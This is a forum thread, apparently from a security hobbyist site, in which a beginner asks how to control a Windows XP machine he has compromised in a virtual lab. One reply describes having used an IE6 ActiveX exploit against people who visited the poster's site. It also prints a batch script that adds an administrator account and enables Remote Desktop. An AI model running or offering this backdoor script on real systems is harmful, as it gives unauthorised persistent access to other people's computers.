Jump to content


Recommended Posts

Hello allz,

I'm new on the forum and a bit of a noob whent it comes to backtrack.

Here is the setup:

Using VM i have a setup of 2 machines xp sp3 and backtrack 5 r3.

Using armitage I gained control of the xp machine, but I was wondering if there is any way to remotely install software on that xp machine.

Link to comment
Share on other sites

English is not my first language so I may not have raised my point clear enouph.

Using armitage i could launch a command prompt and see documents and such but i was wondering if there is a solution like remote desktop or something, not necessary using armitage, but other tools.

Let's say that on the xp machine there is a software running and i want to remotely control that software. I can gain access to the xp machine but how can i control that software.....

Link to comment
Share on other sites

If you compromised the machine and escalated yourself to admin, you could most certainly install anything you wanted for the most part. Some GUI programs even have command line switches to run the silently and accept all EULA's for example.

As for controlling software, you could also enable via the command line RDP or run a reverse VNC install and just remote in over the GUI as well, as if you were sitting at the machine and do whatever you wanted that way too. Pretty much anything is possible if you've gained elevated privileges. I used to have a bat script I setup for turning on RDP and adding another user to the system. I used to keep it on one of my sites back in the day, that would exploit Internet Explorer, in the event they tried to attack my site and got the error page, it would detect if they had IE6 and run the active-x exploit, then make them run the bat file which enabled RDP and added an admin user for me, so long as they were logged on with admin privileges, which most Windows XP users were back then, always the admin, and not smart enough to setup limited user accounts for web surfing from home.

edit: had to find the bat script. Not sure if this even works still.

@echo off
net user stupid password /add && net localgroup Administrators stupid /add
SC config "TermService" start= "auto"
NET START "Terminal Services"
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F
@echo on
echo Success!

Edited by digip
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...